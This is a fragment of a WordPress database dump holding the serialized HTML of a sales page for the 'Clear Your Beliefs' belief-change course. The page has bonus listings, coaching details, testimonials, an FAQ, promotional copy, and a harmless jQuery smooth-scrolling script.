Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1877, 2164, 'panels_data', 'a:3:{s:7:"widgets";a:5:{i:0;a:4:{s:5:"title";s:17:"CYB banner header";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:24:"Video Clear Your Beliefs";s:4:"text";s:229:"<p>&lt;center&gt;<br />&lt;div class=''embed-container''&gt;<br />     &lt;iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen&gt;&lt;/iframe&gt;<br />&lt;/div&gt;<br />&lt;/center&gt;</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:5:"title";s:9:"Red quote";s:4:"text";s:661:"<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:7:"Bullets";s:4:"text";s:1948:"<p>&lt;div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"&gt;<br />&lt;h2&gt;The &lt;em&gt;Clear Your Beliefs&lt;/em&gt; Program empowers you to...&lt;/h2&gt;<br />[su_row][su_column size="1/2"]<br />&lt;ul style="margin-left: 25px;"&gt;<br />    &lt;li&gt;Release pain and hurts from the past&lt;/li&gt;<br />    &lt;li&gt;Open to deeper, more profound love&lt;/li&gt;<br />    &lt;li&gt;Recognize your true spiritual nature&lt;/li&gt;<br />    &lt;li&gt;Become more calm and less reactive&lt;/li&gt;<br />    &lt;li&gt;Rediscover the source of your personal power&lt;/li&gt;<br />&lt;/ul&gt;<br />[/su_column][su_column size="1/2"]<br />&lt;ul&gt;<br />    &lt;li&gt;Clear whatever stops you from taking action&lt;/li&gt;<br />    &lt;li&gt;Open yourself to new possibilities of success&lt;/li&gt;<br />    &lt;li&gt;Eliminate blocks and barriers easily&lt;/li&gt;<br />    &lt;li&gt;Discover your true purpose&lt;/li&gt;<br />    &lt;li&gt;Express your true magnificence&lt;/li&gt;<br />&lt;/ul&gt;<br />[/su_column][/su_row]<br />&lt;h2&gt;How and Why It Works So Well&lt;/h2&gt;<br />&lt;ul style="margin-left: 26px;"&gt;<br />    &lt;li&gt;Beliefs are the major cause of unhappiness, upsets, and limitations.&lt;/li&gt;<br />    &lt;li&gt;The &lt;em&gt;Clear Your Beliefs Program&lt;/em&gt; eliminates beliefs at the core of the psyche.&lt;/li&gt;<br />    &lt;li&gt;The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.&lt;/li&gt;<br />    &lt;li&gt;You''re in charge – you decide what you want to believe, and how far you want to go.&lt;/li&gt;<br />    &lt;li&gt;The program guides you, gently, step-by-step, through the entire process of deleting beliefs.&lt;/li&gt;<br />    &lt;li&gt;Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.&lt;/li&gt;<br />&lt;/ul&gt;<br />&lt;/div&gt;</p>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:70516:"\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img 